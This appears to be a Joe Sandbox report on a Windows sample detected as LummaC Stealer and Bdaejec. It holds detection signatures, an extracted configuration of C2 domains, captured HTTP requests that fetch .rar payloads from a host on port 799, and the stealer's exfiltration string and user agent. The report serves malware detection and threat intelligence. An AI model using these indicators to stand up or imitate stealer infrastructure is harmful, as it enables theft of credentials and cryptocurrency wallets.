Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Lisect_AVT_24003_G1A_72.exe

Overview

General Information

Sample name:Lisect_AVT_24003_G1A_72.exe
Analysis ID:1481153
MD5:0140e8aab1d9274870495213cdf82291
SHA1:094a5f534dd47158b2e936f1c6bb8351fb3f1706
SHA256:61f30e4ff3a0f6c6b50ac05dacc8344ba3ed9911c2888a606e7c15c4ea4a469f
Tags:exe
Infos:

Detection

LummaC, Bdaejec, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Bdaejec
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

  • System is w10x64
  • Lisect_AVT_24003_G1A_72.exe (PID: 5024 cmdline: "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe" MD5: 0140E8AAB1D9274870495213CDF82291)
    • jawuwAtX.exe (PID: 5352 cmdline: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 1812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1548 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro", "strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro"], "Build id": "kPnM2L--LogsDillerCloud"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: jawuwAtX.exe PID: 5352JoeSecurity_BdaejecYara detected BdaejecJoe Security
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      No Snort rule has matched

      Suricata Signatures

      Timestamp:2024-07-25T04:58:13.398502+0200
      SID:2807908
      Source Port:49713
      Destination Port:799
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-07-25T04:58:16.407005+0200
      SID:2050861
      Source Port:51048
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:16.386793+0200
      SID:2050856
      Source Port:54832
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:20.629540+0200
      SID:2028371
      Source Port:49717
      Destination Port:443
      Protocol:TCP
      Classtype:Unknown Traffic
      Timestamp:2024-07-25T04:58:16.445372+0200
      SID:2050857
      Source Port:54220
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:17.447057+0200
      SID:2807908
      Source Port:49715
      Destination Port:799
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-07-25T04:59:07.625811+0200
      SID:2022930
      Source Port:443
      Destination Port:49724
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-07-25T04:58:12.573742+0200
      SID:2838522
      Source Port:54030
      Destination Port:53
      Protocol:UDP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-07-25T04:58:16.431602+0200
      SID:2050859
      Source Port:54443
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:30.030977+0200
      SID:2022930
      Source Port:443
      Destination Port:49719
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-07-25T04:58:16.357306+0200
      SID:2050858
      Source Port:52674
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:16.420501+0200
      SID:2050860
      Source Port:56548
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:16.306584+0200
      SID:2050898
      Source Port:56995
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: Lisect_AVT_24003_G1A_72.exeAvira: detected
      Antivirus detection for URL or domain
      Source: http://ddos.dnsnb8.net:799/cj//k2.rarURL Reputation: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
      Source: http://ddos.dnsnb8.net/URL Reputation: Label: malware
      Source: healthproline.proAvira URL Cloud: Label: malware
      Source: smallrabbitcrossing.siteAvira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k1.rarsAvira URL Cloud: Label: phishing
      Source: https://strainriskpropos.store/apiAvira URL Cloud: Label: malware
      Source: https://strainriskpropos.store:443/apiAvira URL Cloud: Label: malware
      Source: https://telephoneverdictyow.site/apiGaXAvira URL Cloud: Label: malware
      Source: https://strainriskpropos.store/D%DAvira URL Cloud: Label: malware
      Source: https://punchtelephoneverdi.store:443/apiAvira URL Cloud: Label: malware
      Source: https://snuggleapplicationswo.fun/Avira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k2.rarNp3Avira URL Cloud: Label: malware
      Source: https://telephoneverdictyow.site/lAvira URL Cloud: Label: malware
      Source: https://telephoneverdictyow.site/Avira URL Cloud: Label: malware
      Source: https://smallrabbitcrossing.site/apiAvira URL Cloud: Label: malware
      Source: https://telephoneverdictyow.site/apiAvira URL Cloud: Label: malware
      Source: telephoneverdictyow.siteAvira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k1.rar=Avira URL Cloud: Label: phishing
      Source: http://ddos.dnsnb8.net:799/cj//k2.rarhAvira URL Cloud: Label: phishing
      Source: https://punchtelephoneverdi.store/Avira URL Cloud: Label: malware
      Source: https://strainriskpropos.store/Avira URL Cloud: Label: malware
      Source: https://strainriskpropos.store/M%sAvira URL Cloud: Label: malware
      Source: https://punchtelephoneverdi.store/apihLAvira URL Cloud: Label: malware
      Source: https://strainriskpropos.store/api;Avira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k1.rarZAvira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k2.rarF;Avira URL Cloud: Label: phishing
      Source: https://telephoneverdictyow.site:443/apiAvira URL Cloud: Label: malware
      Source: https://smallrabbitcrossing.site/Avira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager1Avira URL Cloud: Label: malware
      Source: snuggleapplicationswo.funAvira URL Cloud: Label: malware
      Antivirus detection for dropped file
      Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
      Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
      Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
      Found malware configuration
      Source: Lisect_AVT_24003_G1A_72.exe.5024.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro", "strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro"], "Build id": "kPnM2L--LogsDillerCloud"}
      Multi AV Scanner detection for domain / URL
      Source: ddos.dnsnb8.netVirustotal: Detection: 12%Perma Link
      Source: healthproline.proVirustotal: Detection: 10%Perma Link
      Source: telephoneverdictyow.siteVirustotal: Detection: 21%Perma Link
      Source: punchtelephoneverdi.storeVirustotal: Detection: 20%Perma Link
      Source: theoryapparatusjuko.funVirustotal: Detection: 20%Perma Link
      Source: snuggleapplicationswo.funVirustotal: Detection: 21%Perma Link
      Source: strainriskpropos.storeVirustotal: Detection: 21%Perma Link
      Source: smallrabbitcrossing.siteVirustotal: Detection: 21%Perma Link
      Source: https://strainriskpropos.store:443/apiVirustotal: Detection: 18%Perma Link
      Source: https://strainriskpropos.store/apiVirustotal: Detection: 18%Perma Link
      Source: healthproline.proVirustotal: Detection: 10%Perma Link
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeReversingLabs: Detection: 92%
      Multi AV Scanner detection for submitted file
      Source: Lisect_AVT_24003_G1A_72.exeVirustotal: Detection: 86%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for dropped file
      Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
      Machine Learning detection for sample
      Source: Lisect_AVT_24003_G1A_72.exeJoe Sandbox ML: detected
      Sample uses string decryption to hide its real strings
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString decryptor: strainriskpropos.stor
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString decryptor: telephoneverdictyow.site
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString decryptor: punchtelephoneverdi.stor
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString decryptor: smallrabbitcrossing.site
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString decryptor: snuggleapplicationswo.fun
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString decryptor: theoryapparatusjuko.fun
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString decryptor: healthproline.pro
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmpString decryptor: kPnM2L--LogsDillerCloud
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

      Spreading

      barindex
      Infects executable files (exe, dll, sys, html)
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeCode function: 2_2_003229E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_003229E2
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeCode function: 2_2_00322B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00322B8C
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

      Networking

      barindex
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: strainriskpropos.stor
      Source: Malware configuration extractorURLs: telephoneverdictyow.site
      Source: Malware configuration extractorURLs: punchtelephoneverdi.stor
      Source: Malware configuration extractorURLs: smallrabbitcrossing.site
      Source: Malware configuration extractorURLs: smallrabbitcrossing.site
      Source: Malware configuration extractorURLs: snuggleapplicationswo.fun
      Source: Malware configuration extractorURLs: theoryapparatusjuko.fun
      Source: Malware configuration extractorURLs: healthproline.pro
      Source: Malware configuration extractorURLs: strainriskpropos.stor
      Source: Malware configuration extractorURLs: telephoneverdictyow.site
      Source: Malware configuration extractorURLs: punchtelephoneverdi.stor
      Source: Malware configuration extractorURLs: smallrabbitcrossing.site
      Source: Malware configuration extractorURLs: smallrabbitcrossing.site
      Source: Malware configuration extractorURLs: snuggleapplicationswo.fun
      Source: Malware configuration extractorURLs: theoryapparatusjuko.fun
      Source: Malware configuration extractorURLs: healthproline.pro
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 799
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 799
      Source: global trafficTCP traffic: 192.168.2.6:49713 -> 44.221.84.105:799
      Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
      Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exeCode function: 2_2_00321099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,2_2_00321099
      Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
      Source: global trafficDNS traffic detected: DNS query: healthproline.pro
      Source: global trafficDNS traffic detected: DNS query: theoryapparatusjuko.fun
      Source: global trafficDNS traffic detected: DNS query: snuggleapplicationswo.fun
      Source: global trafficDNS traffic detected: DNS query: smallrabbitcrossing.site
      Source: global trafficDNS traffic detected: DNS query: punchtelephoneverdi.store
      Source: global trafficDNS traffic detected: DNS query: telephoneverdictyow.site
      Source: global trafficDNS traffic detected: DNS query: strainriskpropos.store
      Source: jawuwAtX.exe, 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp, jawuwAtX.exe, 00000002.00000003.2145539627.0000000000F50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
      Source: jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
      Source: jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar=
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarZ
      Source: jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
      Source: jawuwAtX.exe, 00000002.00000002.2236447017.0000000002A4A000.00000004.00000010.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000002.2236131842.0000000001054000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager1
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001054000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarF;
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001054000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarNp3
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarh
      Source: Amcache.hve.2.drString found in binary or memory: http://upx.sf.net
      Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.com
      Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.comHolger
      Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.com
      Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.comBrendon
      Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.com
      Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.comDeepak
      Source: SciTE.exe.2.drString found in binary or memory: http://www.lua.org
      Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.com
      Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.comJosiah
      Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org
      Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org/scite.rng
      Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.com
      Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.comMathias
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://punchtelephoneverdi.store/
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://punchtelephoneverdi.store/apihL
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://punchtelephoneverdi.store:443/api
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smallrabbitcrossing.site/
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smallrabbitcrossing.site/api
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://snuggleapplicationswo.fun/
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strainriskpropos.store/
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strainriskpropos.store/D%D
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strainriskpropos.store/M%s
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strainriskpropos.store/api
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strainriskpropos.store/api;
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://strainriskpropos.store:443/api
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telephoneverdictyow.site/
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telephoneverdictyow.site/api
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telephoneverdictyow.site/apiGaX
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telephoneverdictyow.site/l
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telephoneverdictyow.site:443/api
      Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/
      Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/Morten
      Source: SciTE.exe.2.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_6127ce1a-0

      System Summary

      barindex
      PE file contains section with special chars
      Source: Lisect_AVT_24003_G1A_72.exeStatic PE information: section name:
